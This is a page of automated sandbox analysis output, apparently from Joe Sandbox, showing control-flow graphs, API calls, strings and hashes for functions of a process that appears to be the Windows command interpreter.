                                                                              control_flow_graph 0 7ff64b56aa54-7ff64b56aa98 call 7ff64b56cd90 3 7ff64b57bf5a-7ff64b57bf70 call 7ff64b574c1c call 7ff64b56ff70 0->3 4 7ff64b56aa9e 0->4 6 7ff64b56aaa5-7ff64b56aaa8 4->6 8 7ff64b56acde-7ff64b56ad00 6->8 9 7ff64b56aaae-7ff64b56aac8 wcschr 6->9 14 7ff64b56ad06 8->14 9->8 10 7ff64b56aace-7ff64b56aae9 towlower 9->10 10->8 13 7ff64b56aaef-7ff64b56aaf3 10->13 16 7ff64b56aaf9-7ff64b56aafd 13->16 17 7ff64b57beb7-7ff64b57bec4 call 7ff64b58eaf0 13->17 18 7ff64b56ad0d-7ff64b56ad1f 14->18 19 7ff64b56ab03-7ff64b56ab07 16->19 20 7ff64b57bbcf 16->20 32 7ff64b57bec6-7ff64b57bed8 call 7ff64b563240 17->32 33 7ff64b57bf43-7ff64b57bf59 call 7ff64b574c1c 17->33 21 7ff64b56ad22-7ff64b56ad2a call 7ff64b5713e0 18->21 23 7ff64b56ab7d-7ff64b56ab81 19->23 24 7ff64b56ab09-7ff64b56ab0d 19->24 29 7ff64b57bbde 20->29 21->6 27 7ff64b56ab87-7ff64b56ab95 23->27 28 7ff64b57be63 23->28 24->28 30 7ff64b56ab13-7ff64b56ab17 24->30 34 7ff64b56ab98-7ff64b56aba0 27->34 41 7ff64b57be72-7ff64b57be88 call 7ff64b563278 call 7ff64b574c1c 28->41 39 7ff64b57bbea-7ff64b57bbec 29->39 30->23 35 7ff64b56ab19-7ff64b56ab1d 30->35 32->33 47 7ff64b57beda-7ff64b57bee9 call 7ff64b563240 32->47 33->3 34->34 38 7ff64b56aba2-7ff64b56abb3 call 7ff64b56cd90 34->38 35->29 40 7ff64b56ab23-7ff64b56ab27 35->40 38->3 53 7ff64b56abb9-7ff64b56abde call 7ff64b5713e0 call 7ff64b5733a8 38->53 49 7ff64b57bbf8-7ff64b57bc01 39->49 40->39 45 7ff64b56ab2d-7ff64b56ab31 40->45 68 7ff64b57be89-7ff64b57be8c 41->68 45->14 50 7ff64b56ab37-7ff64b56ab3b 45->50 57 7ff64b57beeb-7ff64b57bef1 47->57 58 7ff64b57bef3-7ff64b57bef9 47->58 49->18 50->49 54 7ff64b56ab41-7ff64b56ab45 50->54 91 7ff64b56abe4-7ff64b56abe7 53->91 92 7ff64b56ac75 53->92 60 7ff64b56ab4b-7ff64b56ab4f 54->60 61 7ff64b57bc06-7ff64b57bc2a call 7ff64b5713e0 54->61 57->33 57->58 58->33 63 7ff64b57befb-7ff64b57bf0d call 7ff64b563240 58->63 66 7ff64b56ab55-7ff64b56ab78 call 7ff64b5713e0 60->66 67 7ff64b56ad2f-7ff64b56ad33 60->67 79 7ff64b57bc2c-7ff64b57bc4c _wcsnicmp 61->79 80 7ff64b57bc5a-7ff64b57bc61 61->80 63->33 89 7ff64b57bf0f-7ff64b57bf21 call 7ff64b563240 63->89 66->6 72 7ff64b56ad39-7ff64b56ad3d 67->72 73 7ff64b57bc66-7ff64b57bc8a call 7ff64b5713e0 67->73 75 7ff64b57be92-7ff64b57beaa call 7ff64b563278 call 7ff64b574c1c 68->75 76 7ff64b56acbe 68->76 82 7ff64b56ad43-7ff64b56ad49 72->82 83 7ff64b57bcde-7ff64b57bd02 call 7ff64b5713e0 72->83 109 7ff64b57bc8c-7ff64b57bcaa _wcsnicmp 73->109 110 7ff64b57bcc4-7ff64b57bcdc 73->110 121 7ff64b57beab-7ff64b57beb6 call 7ff64b574c1c 75->121 86 7ff64b56acc0-7ff64b56acc7 76->86 79->80 90 7ff64b57bc4e-7ff64b57bc55 79->90 95 7ff64b57bd31-7ff64b57bd4f _wcsnicmp 80->95 93 7ff64b57bd5e-7ff64b57bd65 82->93 94 7ff64b56ad4f-7ff64b56ad68 82->94 112 7ff64b57bd2a 83->112 113 7ff64b57bd04-7ff64b57bd24 _wcsnicmp 83->113 86->86 97 7ff64b56acc9-7ff64b56acda 86->97 89->33 123 7ff64b57bf23-7ff64b57bf35 call 7ff64b563240 89->123 104 7ff64b57bbb3-7ff64b57bbb7 90->104 91->76 106 7ff64b56abed-7ff64b56ac0b call 7ff64b56cd90 * 2 91->106 101 7ff64b56ac77-7ff64b56ac7f 92->101 93->94 105 7ff64b57bd6b-7ff64b57bd73 93->105 107 7ff64b56ad6d-7ff64b56ad70 94->107 108 7ff64b56ad6a 94->108 102 7ff64b57bd55 95->102 103 7ff64b57bbc2-7ff64b57bbca 95->103 97->8 101->76 119 7ff64b56ac81-7ff64b56ac85 101->119 102->93 103->6 114 7ff64b57bbba-7ff64b57bbbd call 7ff64b5713e0 104->114 115 7ff64b57be4a-7ff64b57be5e 105->115 116 7ff64b57bd79-7ff64b57bd8b iswxdigit 105->116 106->121 140 7ff64b56ac11-7ff64b56ac14 106->140 107->21 108->107 109->110 120 7ff64b57bcac-7ff64b57bcbf 109->120 110->95 112->95 113->112 122 7ff64b57bbac 113->122 114->103 115->114 116->115 126 7ff64b57bd91-7ff64b57bda3 iswxdigit 116->126 124 7ff64b56ac88-7ff64b56ac8f 119->124 120->104 121->17 122->104 123->33 141 7ff64b57bf37-7ff64b57bf3e call 7ff64b563240 123->141 124->124 132 7ff64b56ac91-7ff64b56ac94 124->132 126->115 129 7ff64b57bda9-7ff64b57bdbb iswxdigit 126->129 129->115 136 7ff64b57bdc1-7ff64b57bdd7 iswdigit 129->136 132->76 135 7ff64b56ac96-7ff64b56acaa wcsrchr 132->135 135->76 142 7ff64b56acac-7ff64b56acb9 call 7ff64b571300 135->142 138 7ff64b57bdd9-7ff64b57bddd 136->138 139 7ff64b57bddf-7ff64b57bdeb towlower 136->139 143 7ff64b57bdee-7ff64b57be0f iswdigit 138->143 139->143 140->121 144 7ff64b56ac1a-7ff64b56ac33 memset 140->144 141->33 142->76 147 7ff64b57be17-7ff64b57be23 towlower 143->147 148 7ff64b57be11-7ff64b57be15 143->148 144->92 149 7ff64b56ac35-7ff64b56ac4b wcschr 144->149 150 7ff64b57be26-7ff64b57be45 call 7ff64b5713e0 147->150 148->150 149->92 151 7ff64b56ac4d-7ff64b56ac54 149->151 150->115 152 7ff64b56ac5a-7ff64b56ac6f wcschr 151->152 153 7ff64b56ad72-7ff64b56ad91 wcschr 151->153 152->92 152->153 155 7ff64b56ad97-7ff64b56adac wcschr 153->155 156 7ff64b56af03-7ff64b56af07 153->156 155->156 157 7ff64b56adb2-7ff64b56adc7 wcschr 155->157 156->92 157->156 158 7ff64b56adcd-7ff64b56ade2 wcschr 157->158 158->156 159 7ff64b56ade8-7ff64b56adfd wcschr 158->159 159->156 160 7ff64b56ae03-7ff64b56ae18 wcschr 159->160 160->156 161 7ff64b56ae1e-7ff64b56ae21 160->161 162 7ff64b56ae24-7ff64b56ae27 161->162 162->156 163 7ff64b56ae2d-7ff64b56ae40 iswspace 162->163 164 7ff64b56ae4b-7ff64b56ae5e 163->164 165 7ff64b56ae42-7ff64b56ae49 163->165 166 7ff64b56ae66-7ff64b56ae6d 164->166 165->162 166->166 167 7ff64b56ae6f-7ff64b56ae77 166->167 167->41 168 7ff64b56ae7d-7ff64b56ae97 call 7ff64b5713e0 167->168 171 7ff64b56ae9a-7ff64b56aea4 168->171 172 7ff64b56aebc-7ff64b56aef8 call 7ff64b570a6c call 7ff64b56ff70 * 2 171->172 173 7ff64b56aea6-7ff64b56aead 171->173 172->101 181 7ff64b56aefe 172->181 173->172 175 7ff64b56aeaf-7ff64b56aeba 173->175 175->171 175->172 181->68
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: wcschr$Heap$AllocateProcessiswspacememsettowlowerwcsrchr
                                                                              • String ID: :$:$:$:ON$OFF
                                                                              • API String ID: 4076514806-467788257
                                                                              • Opcode ID: ec77655612b2197603e506f96a5fdd07df98b32b07624a2fc81e4f2603e93a28
                                                                              • Instruction ID: 062c506042b733e88d80f67e0759bc8add7f2d9b9b7fe230d8a2f9887a20aec4
                                                                              • Opcode Fuzzy Hash: ec77655612b2197603e506f96a5fdd07df98b32b07624a2fc81e4f2603e93a28
                                                                              • Instruction Fuzzy Hash: A4229F61B0C68286FA6CBF25D514278F6A1EF4DB81F489035CA2EC73B6DF7CA8458350
                                                                              Function 00007FF64B5751EC Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 384COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 182 7ff64b5751ec-7ff64b575248 call 7ff64b575508 GetLocaleInfoW 185 7ff64b57ef32-7ff64b57ef3c 182->185 186 7ff64b57524e-7ff64b575272 GetLocaleInfoW 182->186 187 7ff64b57ef3f-7ff64b57ef49 185->187 188 7ff64b575274-7ff64b57527a 186->188 189 7ff64b575295-7ff64b5752b9 GetLocaleInfoW 186->189 190 7ff64b57ef4b-7ff64b57ef52 187->190 191 7ff64b57ef61-7ff64b57ef6c 187->191 192 7ff64b5754f7-7ff64b5754f9 188->192 193 7ff64b575280-7ff64b575286 188->193 194 7ff64b5752bb-7ff64b5752c3 189->194 195 7ff64b5752de-7ff64b575305 GetLocaleInfoW 189->195 190->191 200 7ff64b57ef54-7ff64b57ef5f 190->200 197 7ff64b57ef75-7ff64b57ef78 191->197 192->185 193->192 201 7ff64b57528c-7ff64b57528f 193->201 196 7ff64b5752c9-7ff64b5752d7 194->196 194->197 198 7ff64b575307-7ff64b57531b 195->198 199 7ff64b575321-7ff64b575343 GetLocaleInfoW 195->199 196->195 204 7ff64b57ef7a-7ff64b57ef7d 197->204 205 7ff64b57ef99-7ff64b57efa3 197->205 198->199 202 7ff64b575349-7ff64b57536e GetLocaleInfoW 199->202 203 7ff64b57efaf-7ff64b57efb9 199->203 200->187 200->191 201->189 206 7ff64b575374-7ff64b575396 GetLocaleInfoW 202->206 207 7ff64b57eff2-7ff64b57effc 202->207 209 7ff64b57efbc-7ff64b57efc6 203->209 204->195 208 7ff64b57ef83-7ff64b57ef8d 204->208 205->203 213 7ff64b57539c-7ff64b5753be GetLocaleInfoW 206->213 214 7ff64b57f035-7ff64b57f03f 206->214 212 7ff64b57efff-7ff64b57f009 207->212 208->205 210 7ff64b57efc8-7ff64b57efcf 209->210 211 7ff64b57efde-7ff64b57efe9 209->211 210->211 215 7ff64b57efd1-7ff64b57efdc 210->215 211->207 216 7ff64b57f00b-7ff64b57f012 212->216 217 7ff64b57f021-7ff64b57f02c 212->217 218 7ff64b57f078-7ff64b57f082 213->218 219 7ff64b5753c4-7ff64b5753e6 GetLocaleInfoW 213->219 220 7ff64b57f042-7ff64b57f04c 214->220 215->209 215->211 216->217 222 7ff64b57f014-7ff64b57f01f 216->222 217->214 221 7ff64b57f085-7ff64b57f08f 218->221 223 7ff64b5753ec-7ff64b57540e GetLocaleInfoW 219->223 224 7ff64b57f0bb-7ff64b57f0c5 219->224 225 7ff64b57f064-7ff64b57f06f 220->225 226 7ff64b57f04e-7ff64b57f055 220->226 227 7ff64b57f0a7-7ff64b57f0b2 221->227 228 7ff64b57f091-7ff64b57f098 221->228 222->212 222->217 230 7ff64b575414-7ff64b575436 GetLocaleInfoW 223->230 231 7ff64b57f0fe-7ff64b57f108 223->231 229 7ff64b57f0c8-7ff64b57f0d2 224->229 225->218 226->225 232 7ff64b57f057-7ff64b57f062 226->232 227->224 228->227 233 7ff64b57f09a-7ff64b57f0a5 228->233 234 7ff64b57f0ea-7ff64b57f0f5 229->234 235 7ff64b57f0d4-7ff64b57f0db 229->235 236 7ff64b57543c-7ff64b57545e GetLocaleInfoW 230->236 237 7ff64b57f141-7ff64b57f14b 230->237 238 7ff64b57f10b-7ff64b57f115 231->238 232->220 232->225 233->221 233->227 234->231 235->234 240 7ff64b57f0dd-7ff64b57f0e8 235->240 241 7ff64b575464-7ff64b575486 GetLocaleInfoW 236->241 242 7ff64b57f184-7ff64b57f18b 236->242 239 7ff64b57f14e-7ff64b57f158 237->239 243 7ff64b57f12d-7ff64b57f138 238->243 244 7ff64b57f117-7ff64b57f11e 238->244 245 7ff64b57f15a-7ff64b57f161 239->245 246 7ff64b57f170-7ff64b57f17b 239->246 240->229 240->234 248 7ff64b57548c-7ff64b5754ae GetLocaleInfoW 241->248 249 7ff64b57f1c4-7ff64b57f1ce 241->249 247 7ff64b57f18e-7ff64b57f198 242->247 243->237 244->243 250 7ff64b57f120-7ff64b57f12b 244->250 245->246 251 7ff64b57f163-7ff64b57f16e 245->251 246->242 252 7ff64b57f19a-7ff64b57f1a1 247->252 253 7ff64b57f1b0-7ff64b57f1bb 247->253 254 7ff64b57f207-7ff64b57f20e 248->254 255 7ff64b5754b4-7ff64b5754f5 setlocale call 7ff64b578f80 248->255 256 7ff64b57f1d1-7ff64b57f1db 249->256 250->238 250->243 251->239 251->246 252->253 260 7ff64b57f1a3-7ff64b57f1ae 252->260 253->249 259 7ff64b57f211-7ff64b57f21b 254->259 257 7ff64b57f1dd-7ff64b57f1e4 256->257 258 7ff64b57f1f3-7ff64b57f1fe 256->258 257->258 262 7ff64b57f1e6-7ff64b57f1f1 257->262 258->254 263 7ff64b57f21d-7ff64b57f224 259->263 264 7ff64b57f233-7ff64b57f23e 259->264 260->247 260->253 262->256 262->258 263->264 266 7ff64b57f226-7ff64b57f231 263->266 266->259 266->264
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale$DefaultLangUsersetlocale
                                                                              • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                              • API String ID: 2492766124-2236139042
                                                                              • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                              • Instruction ID: 44832ff68be2c04480b7a2949da4b05ee376eee70333b5088dc7bf236cedd6ed
                                                                              • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                              • Instruction Fuzzy Hash: D1F14861B0C78285EA29BF15E9102B9B6A5FF0CB80F948135CA2D977B6EF7CE505C350
                                                                              Function 00007FF64B575554 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 295registryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 267 7ff64b575554-7ff64b5755b9 call 7ff64b57a640 270 7ff64b5755bc-7ff64b5755e8 RegOpenKeyExW 267->270 271 7ff64b575887-7ff64b57588e 270->271 272 7ff64b5755ee-7ff64b575631 RegQueryValueExW 270->272 271->270 275 7ff64b575894-7ff64b5758db time srand call 7ff64b578f80 271->275 273 7ff64b57f248-7ff64b57f24d 272->273 274 7ff64b575637-7ff64b575675 RegQueryValueExW 272->274 276 7ff64b57f260-7ff64b57f265 273->276 277 7ff64b57f24f-7ff64b57f25b 273->277 278 7ff64b575677-7ff64b57567c 274->278 279 7ff64b57568e-7ff64b5756cc RegQueryValueExW 274->279 276->274 281 7ff64b57f26b-7ff64b57f286 _wtol 276->281 277->274 282 7ff64b57f28b-7ff64b57f290 278->282 283 7ff64b575682-7ff64b575687 278->283 284 7ff64b57f2b6-7ff64b57f2bb 279->284 285 7ff64b5756d2-7ff64b575710 RegQueryValueExW 279->285 281->274 282->279 287 7ff64b57f296-7ff64b57f2b1 _wtol 282->287 283->279 288 7ff64b57f2bd-7ff64b57f2c9 284->288 289 7ff64b57f2ce-7ff64b57f2d3 284->289 290 7ff64b575729-7ff64b575767 RegQueryValueExW 285->290 291 7ff64b575712-7ff64b575717 285->291 287->279 288->285 289->285 292 7ff64b57f2d9-7ff64b57f2f4 _wtol 289->292 295 7ff64b575769-7ff64b57576e 290->295 296 7ff64b57579f-7ff64b5757dd RegQueryValueExW 290->296 293 7ff64b57571d-7ff64b575722 291->293 294 7ff64b57f2f9-7ff64b57f2fe 291->294 292->285 293->290 294->290 301 7ff64b57f304-7ff64b57f31a wcstol 294->301 297 7ff64b575774-7ff64b57578f 295->297 298 7ff64b57f320-7ff64b57f325 295->298 299 7ff64b57f3a9 296->299 300 7ff64b5757e3-7ff64b5757e8 296->300 302 7ff64b57f357-7ff64b57f35e 297->302 303 7ff64b575795-7ff64b575799 297->303 306 7ff64b57f34b 298->306 307 7ff64b57f327-7ff64b57f33f wcstol 298->307 312 7ff64b57f3b5-7ff64b57f3b8 299->312 304 7ff64b57f363-7ff64b57f368 300->304 305 7ff64b5757ee-7ff64b575809 300->305 301->298 302->296 303->296 303->302 308 7ff64b57f36a-7ff64b57f382 wcstol 304->308 309 7ff64b57f38e 304->309 310 7ff64b57f39a-7ff64b57f39d 305->310 311 7ff64b57580f-7ff64b575813 305->311 306->302 307->306 308->309 309->310 310->299 311->310 313 7ff64b575819-7ff64b575823 311->313 314 7ff64b57582c 312->314 315 7ff64b57f3be-7ff64b57f3c5 312->315 313->312 316 7ff64b575829 313->316 317 7ff64b57f3ca-7ff64b57f3d1 314->317 318 7ff64b575832-7ff64b575870 RegQueryValueExW 314->318 315->318 316->314 319 7ff64b57f3dd-7ff64b57f3e2 317->319 318->319 320 7ff64b575876-7ff64b575882 RegCloseKey 318->320 321 7ff64b57f3e4-7ff64b57f412 ExpandEnvironmentStringsW 319->321 322 7ff64b57f433-7ff64b57f439 319->322 320->271 323 7ff64b57f428 321->323 324 7ff64b57f414-7ff64b57f426 call 7ff64b5713e0 321->324 322->320 325 7ff64b57f43f-7ff64b57f44c call 7ff64b56b900 322->325 327 7ff64b57f42e 323->327 324->327 325->320 327->322
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: QueryValue$CloseOpensrandtime
                                                                              • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                              • API String ID: 145004033-3846321370
                                                                              • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                              • Instruction ID: b35f8e5d41a979be47100b425b46377644e029050b8589c824a39071be1b0cea
                                                                              • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                              • Instruction Fuzzy Hash: C0E16B7262DA82C6E664BF10F4405BAF7A0FB8D745F409135EA9E82A79DFBCD544CB00
                                                                              Function 00007FF64B5737D8 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 269registrythreadmemoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 509 7ff64b5737d8-7ff64b573887 GetCurrentThreadId OpenThread call 7ff64b5704f4 HeapSetInformation RegOpenKeyExW 512 7ff64b57388d-7ff64b5738eb call 7ff64b575920 GetConsoleOutputCP GetCPInfo 509->512 513 7ff64b57e9f8-7ff64b57ea3b RegQueryValueExW RegCloseKey 509->513 516 7ff64b57ea41-7ff64b57ea59 GetThreadLocale 512->516 517 7ff64b5738f1-7ff64b573913 memset 512->517 513->516 518 7ff64b57ea5b-7ff64b57ea67 516->518 519 7ff64b57ea74-7ff64b57ea77 516->519 522 7ff64b573919-7ff64b573935 call 7ff64b574d5c 517->522 523 7ff64b57eaa5 517->523 518->519 520 7ff64b57ea79-7ff64b57ea7d 519->520 521 7ff64b57ea94-7ff64b57ea96 519->521 520->521 525 7ff64b57ea7f-7ff64b57ea89 520->525 521->523 529 7ff64b57393b-7ff64b573942 522->529 530 7ff64b57eae2-7ff64b57eaff call 7ff64b563240 call 7ff64b588530 call 7ff64b574c1c 522->530 526 7ff64b57eaa8-7ff64b57eab4 523->526 525->521 526->522 528 7ff64b57eaba-7ff64b57eac3 526->528 531 7ff64b57eacb-7ff64b57eace 528->531 532 7ff64b573948-7ff64b573962 _setjmp 529->532 533 7ff64b57eb27-7ff64b57eb40 _setjmp 529->533 538 7ff64b57eb00-7ff64b57eb0d 530->538 534 7ff64b57eac5-7ff64b57eac9 531->534 535 7ff64b57ead0-7ff64b57eadb 531->535 537 7ff64b573968-7ff64b57396d 532->537 532->538 539 7ff64b57eb46-7ff64b57eb49 533->539 540 7ff64b5739fe-7ff64b573a05 call 7ff64b574c1c 533->540 534->531 535->526 541 7ff64b57eadd 535->541 544 7ff64b5739b9-7ff64b5739bb 537->544 545 7ff64b57396f 537->545 552 7ff64b57eb15-7ff64b57eb1f call 7ff64b574c1c 538->552 547 7ff64b57eb4b-7ff64b57eb65 call 7ff64b563240 call 7ff64b588530 call 7ff64b574c1c 539->547 548 7ff64b57eb66-7ff64b57eb6f call 7ff64b5701b8 539->548 540->513 541->522 555 7ff64b57eb20 544->555 556 7ff64b5739c1-7ff64b5739c3 call 7ff64b574c1c 544->556 551 7ff64b573972-7ff64b57397d 545->551 547->548 567 7ff64b57eb87-7ff64b57eb89 call 7ff64b5786f0 548->567 568 7ff64b57eb71-7ff64b57eb82 _setmode 548->568 559 7ff64b5739c9-7ff64b5739de call 7ff64b56df60 551->559 560 7ff64b57397f-7ff64b573984 551->560 552->555 555->533 564 7ff64b5739c8 556->564 559->552 577 7ff64b5739e4-7ff64b5739e8 559->577 560->551 569 7ff64b573986-7ff64b5739ae call 7ff64b570580 GetConsoleOutputCP GetCPInfo call 7ff64b5704f4 560->569 564->559 578 7ff64b57eb8e-7ff64b57ebad call 7ff64b5758e4 call 7ff64b56df60 567->578 568->567 586 7ff64b5739b3 569->586 577->540 581 7ff64b5739ea-7ff64b5739ef call 7ff64b56be00 577->581 590 7ff64b57ebaf-7ff64b57ebb3 578->590 587 7ff64b5739f4-7ff64b5739fc 581->587 586->544 587->560 590->540 591 7ff64b57ebb9-7ff64b57ec24 call 7ff64b5758e4 GetConsoleOutputCP GetCPInfo call 7ff64b5704f4 call 7ff64b56be00 call 7ff64b570580 GetConsoleOutputCP GetCPInfo call 7ff64b5704f4 590->591 591->578
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                              • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                              • API String ID: 2624720099-1920437939
                                                                              • Opcode ID: f14ccfe17658d03b7f0c6aedd8572f1845147b0a0877a5eeff18d3955b8dfa43
                                                                              • Instruction ID: 4e5c7b20361afcc95732d1d7fdfbba1c1994017da61cfc3b618c05ad45af3e82
                                                                              • Opcode Fuzzy Hash: f14ccfe17658d03b7f0c6aedd8572f1845147b0a0877a5eeff18d3955b8dfa43
                                                                              • Instruction Fuzzy Hash: 34C18971B0C642CAF718BF64E4442B8FAA5EF4D754F148138DA2ED66B3DEBCA4418B00
                                                                              Function 00007FF64B572978 Relevance: 9.1, APIs: 6, Instructions: 138COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                              • Instruction ID: e15933c34eedb63348197d36623cb427ab5788f76587144726410b0c8c809c5e
                                                                              • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                              • Instruction Fuzzy Hash: 02510861B0C682C6EA34BF15E5442BAE291FB59BA0F588230DE7D876F2DF7CE4418600
                                                                              Function 00007FF64B567D30 Relevance: 3.3, APIs: 2, Instructions: 252COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00007FF64B567DA1
                                                                                • Part of subcall function 00007FF64B57417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF64B5741AD
                                                                                • Part of subcall function 00007FF64B56D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF64B56D46E
                                                                                • Part of subcall function 00007FF64B56D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF64B56D485
                                                                                • Part of subcall function 00007FF64B56D3F0: wcschr.MSVCRT ref: 00007FF64B56D4EE
                                                                                • Part of subcall function 00007FF64B56D3F0: iswspace.MSVCRT ref: 00007FF64B56D54D
                                                                                • Part of subcall function 00007FF64B56D3F0: wcschr.MSVCRT ref: 00007FF64B56D569
                                                                                • Part of subcall function 00007FF64B56D3F0: wcschr.MSVCRT ref: 00007FF64B56D58C
                                                                              • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF64B567EB7
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
